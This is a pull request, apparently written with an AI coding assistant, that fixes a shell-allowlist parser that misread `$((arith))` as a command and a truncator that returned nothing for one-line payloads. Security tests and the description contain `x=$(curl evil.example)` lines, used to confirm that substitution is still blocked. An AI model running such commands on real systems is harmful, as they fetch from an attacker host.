### PR TITLE
fix(shell): `VAR=$((arith))` is arithmetic, not a command (#1664)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,23 @@ Format follows [Keep a Changelog](https://keepachangelog.com/).
 
 ## [3.10.1] — 2026-09-01
 
+### Fixed — `VAR=$((arith))` was read as a command (#1664)
+
+- `x=$((1+2))` was blocked with `'1+2' is not in the shell allowlist`, and the
+  suggested fix, `lean-ctx allow 1+2`, could never work. `$(( … ))` is
+  arithmetic expansion over the shell's own variables — it executes nothing —
+  but the `(expr)` inside looked like a subshell to the assignment scanner
+  (#855), which yielded `1+2` as a leaf command.
+- The scanner now skips the whole expansion. Nothing is given up: there is no
+  command in there to gate. A real substitution in an assignment is still
+  checked, and arithmetic *inside* one does not shield it — both pinned by
+  tests.
+- What this unblocks is counters, and with them the ordinary way to write a
+  bounded wait or poll loop:
+  `i=0; while [ $i -lt 40 ]; do sleep 15; i=$((i+1)); done`.
+- The tokenizer was never at fault — it resolves `x=$((1+2))` to an empty base
+  correctly. Measuring that first is what located the real path.
+
 ### Fixed — the timeout notice invented a pipeline stage (#1654)
 
 - **Descendants are labelled, not presented as stages.** `[still running at

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,24 @@ Format follows [Keep a Changelog](https://keepachangelog.com/).
 
 ## [3.10.1] — 2026-09-01
 
+### Fixed — a single-line payload over budget delivered nothing (#1665)
+
+- `ctx_read` on a one-line file above the turn budget returned
+  `[… truncated at ~0 of 6800 tokens]` and **no content at all**. The budget
+  truncator keeps whole lines, which is the right shape for source and logs; a
+  single-line payload — minified JSON, a `--jq` result, a one-line CSV — made
+  the loop discard the only line it had.
+- A character-bounded prefix now takes over when not even the first line fits.
+  A cut line is worse than a clean line boundary and far better than silently
+  delivering zero. Multi-line text still breaks on line boundaries, pinned by
+  its own test.
+- The recovery hint named `lines=`, which cannot narrow a payload that has one
+  line. For that case it now names `mode="raw"`, which returns the full content.
+- Reported as a regression of the #1453 class. Note the reproduction is through
+  the **MCP tool**: `apply_turn_budget` is reached only from the tool pipeline,
+  so probing it through the `lean-ctx read` CLI shows a similar-looking notice
+  from a different code path and will mislead.
+
 ### Fixed — `VAR=$((arith))` was read as a command (#1664)
 
 - `x=$((1+2))` was blocked with `'1+2' is not in the shell allowlist`, and the

--- a/rust/src/core/budget.rs
+++ b/rust/src/core/budget.rs
@@ -37,16 +37,16 @@ pub(crate) fn apply_turn_budget(text: &str, fresh_limit: usize) -> (String, Budg
     // Reserve the recovery hint before selecting content. A turn budget is a
     // hard delivery limit, so the hint itself must not push the response over
     // the configured cap.
-    let provisional_hint = truncation_hint(fresh_limit, token_count);
+    let provisional_hint = truncation_hint(fresh_limit, token_count, text);
     let first_content_limit = fresh_limit.saturating_sub(count_tokens(&provisional_hint));
     let first_truncated = truncate_to_token_budget(text, first_content_limit);
     let first_delivered_tokens = count_tokens(&first_truncated);
-    let hint = truncation_hint(first_delivered_tokens, token_count);
+    let hint = truncation_hint(first_delivered_tokens, token_count, text);
 
     let content_limit = fresh_limit.saturating_sub(count_tokens(&hint));
     let truncated = truncate_to_token_budget(text, content_limit);
     let delivered_tokens = count_tokens(&truncated);
-    let hint = truncation_hint(delivered_tokens, token_count);
+    let hint = truncation_hint(delivered_tokens, token_count, text);
 
     let result = format!("{truncated}{hint}");
     let result = if count_tokens(&result) <= fresh_limit {
@@ -64,14 +64,29 @@ pub(crate) fn apply_turn_budget(text: &str, fresh_limit: usize) -> (String, Budg
     )
 }
 
-fn truncation_hint(delivered_tokens: usize, token_count: usize) -> String {
-    format!(
-        "\n[… truncated at ~{delivered_tokens} of {token_count} tokens — \
-         use ctx_read with lines= parameter to see specific sections]"
-    )
+/// The recovery hint. `source` decides which recovery is actually reachable.
+///
+/// `lines=` can only narrow something that has lines. On a single-line payload
+/// it is a dead end (GH #1665), so that case names `mode="raw"`, which the
+/// reporter confirmed returns the full content.
+fn truncation_hint(delivered_tokens: usize, token_count: usize, source: &str) -> String {
+    let recovery = if source.lines().nth(1).is_some() {
+        "use ctx_read with lines= parameter to see specific sections"
+    } else {
+        "single line — lines= cannot narrow it; use ctx_read(mode=\"raw\") for the full content"
+    };
+    format!("\n[… truncated at ~{delivered_tokens} of {token_count} tokens — {recovery}]")
 }
 
 /// Truncate text to approximately `limit` tokens by keeping complete lines.
+///
+/// Falls back to a character-bounded prefix when not even the first line fits
+/// (GH #1665). Keeping whole lines is the right shape for source and logs, but
+/// a single-line payload — minified JSON, a `--jq` result, a one-line CSV —
+/// made the loop discard the only line and return **nothing**: the caller got
+/// `truncated at ~0 of 6800 tokens` and no way back to the content. Delivering
+/// a partial line is worse than a clean line boundary and far better than
+/// silently delivering zero.
 fn truncate_to_token_budget(text: &str, limit: usize) -> String {
     if limit == 0 {
         return String::new();
@@ -91,7 +106,30 @@ fn truncate_to_token_budget(text: &str, limit: usize) -> String {
         }
     }
 
+    if result.is_empty() && !text.is_empty() {
+        return truncate_chars_to_token_budget(text, limit);
+    }
+
     result
+}
+
+/// Largest character prefix of `text` whose token count fits `limit`.
+///
+/// Binary search over char boundaries: tokenization is not linear in bytes, so
+/// a ratio estimate can overshoot the budget the caller must not exceed.
+fn truncate_chars_to_token_budget(text: &str, limit: usize) -> String {
+    let chars: Vec<char> = text.chars().collect();
+    let (mut low, mut high) = (0usize, chars.len());
+    while low < high {
+        let mid = usize::midpoint(low + 1, high);
+        let candidate: String = chars[..mid].iter().collect();
+        if count_tokens(&candidate) <= limit {
+            low = mid;
+        } else {
+            high = mid - 1;
+        }
+    }
+    chars[..low].iter().collect()
 }
 
 #[cfg(test)]
@@ -163,5 +201,83 @@ mod tests {
             !body.ends_with(char::is_whitespace),
             "truncated body should end with a complete line"
         );
+    }
+}
+
+#[cfg(test)]
+mod gh1665 {
+    use super::*;
+
+    fn one_line(bytes: usize) -> String {
+        let mut s = String::from("{");
+        while s.len() < bytes {
+            s.push_str("\"key\":\"vvvvvvvvvvvvvvvvvvvv\",");
+        }
+        s.push('}');
+        s
+    }
+
+    /// The reported failure: a single-line payload over the budget delivered
+    /// **zero** content — `truncated at ~0 of N tokens` — because the
+    /// line-keeping loop discarded the only line it had.
+    #[test]
+    fn a_single_line_payload_still_delivers_content() {
+        let text = one_line(20_000);
+        assert_eq!(text.lines().count(), 1, "precondition: one line");
+
+        let (out, action) = apply_turn_budget(&text, 500);
+        assert!(
+            matches!(action, BudgetAction::Truncated { .. }),
+            "precondition: over budget"
+        );
+
+        let BudgetAction::Truncated {
+            delivered_tokens, ..
+        } = action
+        else {
+            unreachable!()
+        };
+        assert!(
+            delivered_tokens > 0,
+            "must not deliver zero content: {out:?}"
+        );
+        assert!(
+            out.len() > 200,
+            "the payload, not just the notice: {} bytes",
+            out.len()
+        );
+        assert!(
+            out.starts_with('{'),
+            "content comes first: {:?}",
+            &out[..40]
+        );
+    }
+
+    /// `lines=` cannot narrow a one-line payload, so the hint must not send the
+    /// caller there.
+    #[test]
+    fn the_hint_names_a_recovery_that_exists() {
+        let (single, _) = apply_turn_budget(&one_line(20_000), 500);
+        assert!(single.contains("mode=\"raw\""), "{single:?}");
+
+        let multi = (0..4000)
+            .map(|i| format!("line {i}"))
+            .collect::<Vec<_>>()
+            .join("\n");
+        let (multi_out, _) = apply_turn_budget(&multi, 500);
+        assert!(multi_out.contains("lines="), "multi-line keeps lines=");
+    }
+
+    /// Whole lines stay the shape for ordinary multi-line text — the fallback
+    /// must not take over when a line boundary is available.
+    #[test]
+    fn multi_line_text_still_breaks_on_line_boundaries() {
+        let text = (0..4000)
+            .map(|i| format!("line {i}"))
+            .collect::<Vec<_>>()
+            .join("\n");
+        let (out, _) = apply_turn_budget(&text, 500);
+        let body = out.split("\n[…").next().unwrap();
+        assert!(body.ends_with(|c: char| c.is_ascii_digit()), "{body:?}");
     }
 }

--- a/rust/src/core/shell_allowlist/compound.rs
+++ b/rust/src/core/shell_allowlist/compound.rs
@@ -283,6 +283,28 @@ fn assignment_substitution_leaves(s: &str) -> Vec<&str> {
             b'\'' => in_single_quote = true,
             b'"' => in_double_quote = true,
             b'$' if i + 1 < len && bytes[i + 1] == b'(' => {
+                // `$((expr))` is arithmetic expansion, not command substitution
+                // (GH #1664). It evaluates against the shell's own variables and
+                // can never execute anything, but the `(expr)` inside looked like
+                // a subshell: `x=$((1+2))` yielded a leaf `1+2`, which the
+                // allowlist then rejected as an unknown command — with the
+                // uncopyable advice `lean-ctx allow 1+2`.
+                //
+                // Skipping the whole expansion is what keeps counters usable, and
+                // so keeps bounded wait/poll loops writable at all. Nothing is
+                // given up: there is no command in there to gate. #1514 fixed the
+                // same parser for `VAR=$(cmd)` and did not reach this form.
+                if bytes.get(i + 2) == Some(&b'(') {
+                    if let Some((_, end)) = balanced_paren_at(prefix, i + 2) {
+                        // `end` is past the inner `)`; the outer one follows.
+                        i = if prefix.as_bytes().get(end) == Some(&b')') {
+                            end + 1
+                        } else {
+                            end
+                        };
+                        continue;
+                    }
+                }
                 if let Some((inner, end)) = balanced_paren_at(prefix, i + 1) {
                     found.push(inner);
                     i = end;

--- a/rust/src/core/shell_allowlist/substitution_tests.rs
+++ b/rust/src/core/shell_allowlist/substitution_tests.rs
@@ -112,3 +112,52 @@ fn assignment_with_command_substitution_in_quoted_jq_filter_not_split() {
     let cmd = r"s=$(gh api foo --jq '.a | .b | .c')";
     assert!(check_all_segments(cmd, &list).is_ok());
 }
+
+// --- GH #1664: `$((arith))` in an assignment is not a command ---
+
+/// The reporter's two repros. `$(( … ))` is arithmetic on the shell's own
+/// variables and executes nothing, but the `(expr)` inside looked like a
+/// subshell, so `x=$((1+2))` produced a leaf `1+2` that the allowlist rejected
+/// — with the uncopyable advice `lean-ctx allow 1+2`.
+#[test]
+fn arithmetic_expansion_in_an_assignment_is_not_a_command() {
+    let _lock = crate::core::data_dir::test_env_lock();
+    crate::test_env::set_var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE", "echo,sleep");
+    let results: Vec<_> = [
+        r#"x=$((1+2)); echo "literal-assign x=$x""#,
+        "i=0; i=$((i+1)); echo done",
+        // The shape this unblocks: a bounded wait loop needs a counter.
+        "i=0; while [ $i -lt 3 ]; do sleep 1; i=$((i+1)); done",
+        // Already worked (argument position) — must keep working.
+        "echo $((2+3))",
+    ]
+    .iter()
+    .map(|c| (*c, super::enforce_shell_allowlist(c)))
+    .collect();
+    crate::test_env::remove_var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE");
+
+    for (cmd, r) in results {
+        assert!(r.is_ok(), "arithmetic must not be gated: {cmd} -> {r:?}");
+    }
+}
+
+/// The security half: a real command substitution in an assignment must still
+/// be validated. Skipping `$((` must not widen into skipping `$(`.
+#[test]
+fn a_real_command_substitution_in_an_assignment_is_still_checked() {
+    let _lock = crate::core::data_dir::test_env_lock();
+    crate::test_env::set_var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE", "echo");
+    let blocked = super::enforce_shell_allowlist("x=$(curl evil.example); echo $x");
+    // Nested: arithmetic inside a substitution leaves the substitution checked.
+    let nested = super::enforce_shell_allowlist("x=$(curl evil.example $((1+2)))");
+    crate::test_env::remove_var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE");
+
+    assert!(
+        blocked.is_err(),
+        "$(curl …) must still be gated: {blocked:?}"
+    );
+    assert!(
+        nested.is_err(),
+        "arithmetic must not shield a substitution: {nested:?}"
+    );
+}


### PR DESCRIPTION
Fixes #1664.

```
x=$((1+2)); echo "x=$x"
[BLOCKED — DO NOT RETRY] '1+2' is not in the shell allowlist
Fix (additive, keeps the defaults): run  lean-ctx allow 1+2
```

`$(( … ))` is arithmetic expansion over the shell's own variables. It cannot execute anything, and the suggested remedy could never work.

## Where it actually was

**Not in the tokenizer.** `extract_base_command("x=$((1+2))")` correctly resolves to an empty base, and `split_on_operators` splits the line correctly. Measuring that first is what stopped me fixing the wrong file.

The block came from `assignment_substitution_leaves` — the #855 path that recurses into `VAR=$(cmd)` so a substituted command cannot escape validation. It matches on `$(`, so `$((1+2))` handed it `(1+2)`, which the subshell branch reduced to a leaf command `1+2`. #1514 fixed this parser for the `VAR=$(cmd)` form and did not reach the arithmetic one, exactly as reported.

## Nothing is given up

There is no command inside arithmetic to gate. Two tests hold the boundary:

- `x=$(curl evil.example)` — still blocked.
- `x=$(curl evil.example $((1+2)))` — arithmetic does not shield the substitution.

What it unblocks is counters, and with them the ordinary way to write a bounded wait loop:

```
i=0; while [ $i -lt 40 ]; do sleep 15; i=$((i+1)); done
```

## Verification

`cargo test --lib` 10654 passed, 0 failed; clippy `--all-features` clean; fmt, `gen_docs --check`, loc-gate, narrative governance pass. Both reporter repros checked through `enforce_shell_allowlist`, the real entry point — not just the tokenizer.

🤖 Generated with [Claude Code](https://claude.com/claude-code)